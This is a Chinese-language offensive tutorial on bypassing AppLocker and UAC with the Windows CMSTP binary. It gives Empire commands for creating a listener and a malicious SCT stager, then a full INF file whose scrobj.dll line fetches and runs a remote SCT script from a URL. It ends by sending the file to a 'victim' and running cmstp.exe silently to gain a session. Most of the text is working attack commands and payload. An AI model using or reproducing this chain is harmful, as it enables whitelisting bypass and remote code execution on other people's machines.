默認情況下,AppLocker允許在文件夾中執行二進制文件,這是可以繞過它的主要原因。已經發現,這樣的二進制文件可以很容易地用於繞過AppLocker和UAC。與Microsoft相關的二進制文件之一是CMSTP。CMSTP welcomes INF文件,因此通過INF進行開發是可能的。因此,我們將學習如何進行此類開發。
眾所周知,CMSTP接受SCT文件,然后無提示地運行,因此我們將創建一個惡意的SCT文件以實現我們的目標。為此,我們將使用Empire PowerShell。有關Empire PowerShell的詳細指南,請單擊此處。
從Kali終端啟動Empire框架,然后輸入以下命令以創建惡意軟件:
listeners uselistener http set Host 192.168.1.109 execute
上面的命令將為您創建一個偵聽器,然后鍵入back以從偵聽器接口返回,並且創建SCT文件類型:
usestager windows/launcher_sct set Listener HTTP execute
運行上述漏洞將創建SCT文件。我們將使用以下腳本在PowerShell中執行文件。在此腳本中,給出SCT文件的路徑,並添加以下代碼,如圖所示:
從這里下載此腳本:
;cmstp.exe /s cmstp.inf [version] Signature=$chicago$ AdvancedINF=2.5 [DefaultInstall_SingleUser] UnRegisterOCXs=UnRegisterOCXSection [UnRegisterOCXSection] %11%\scrobj.dll,NI,https://gist.githubusercontent.com/NickTyrer/0604bb9d7bcfef9e0cf82c28a7b76f0f/raw/676451571c203303a95b95fcb29c8b7deb8a66e0/powersct.sct [Strings] AppAct = "SOFTWARE\Microsoft\Connection Manager" ServiceName="Yay" ShortSvcName="Yay"
現在,將文件發送到受害者的PC,並在受害者的命令提示符下運行以下命令:
cmstp.exe /s shell.inf
一旦運行該命令,您將獲得一個meterprer會話。使用以下命令訪問會話:
interact <session name>
這樣,您可以使用CMSTP二進制文件來繞過applocker限制。CMSTP需要一個INF文件,並且利用它可以幫助您訪問受害者的PC。